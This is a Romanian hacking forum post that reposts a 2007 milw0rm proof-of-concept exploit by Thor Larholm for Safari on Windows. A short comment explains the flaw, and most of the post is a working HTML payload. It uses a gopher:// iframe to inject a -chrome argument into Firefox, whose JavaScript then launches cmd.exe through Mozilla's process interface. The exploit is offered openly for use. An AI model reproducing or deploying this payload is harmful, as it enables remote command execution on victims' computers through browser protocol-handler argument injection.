Hacking and more...
HaCkinG CulT
|
Lista Forumurilor Pe Tematici
|
Hacking and more... | Reguli | Inregistrare | Login
POZE HACKING AND MORE...
Nu sunteti logat.
|
Nou pe simpatie:
karina22 pe Simpatie.ro
 | Femeie
25 ani
Bucuresti
cauta Barbat
25 - 54 ani |
|
|
dannybest
Junior+
Inregistrat: acum 17 ani
Postari: 31
|
|
<!--
Safari for Windows, 0day exploit in 2 hours
By Thor Larholm
The below PoC exploit will exploit Safari by bouncing through Firefox
via the Gopher protocol, passing on unfiltered input for the -chrome
argument that Firefox exposes. When it has done this it will launch
C:WindowsSystem32cmd.exe with any arguments that have been specified
in the call to the process.run method.
It is important to know that, even though this PoC exploit uses Firefox,
the actual vulnerability is within the lack of input validation for the
command line arguments handed to the various URL protocol handlers on
your machine. As such, there are a lot of different attack vectors for
this vulnerability, I simply chose Firefox and the Gopher URL protocol
because I was familiar with these.
I hope you enjoyed the fruits of my 2 hours of labour. Please feel free
to add my RSS feed to your reader and come back again tomorrow or next
week for a fresh batch of 0day vulnerabilities :)
Cheers Thor Larholm
-->
<html><body>
<iframe src='gopher://larholm.com" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true,{},0);alert(process)'></iframe>process.init(file);process.run(true,{},0);alert(process)
</body></html>
# milw0rm.com [2007-06-12]
Modificat de dannybest (acum 17 ani)
|
|
| pus acum 17 ani |
|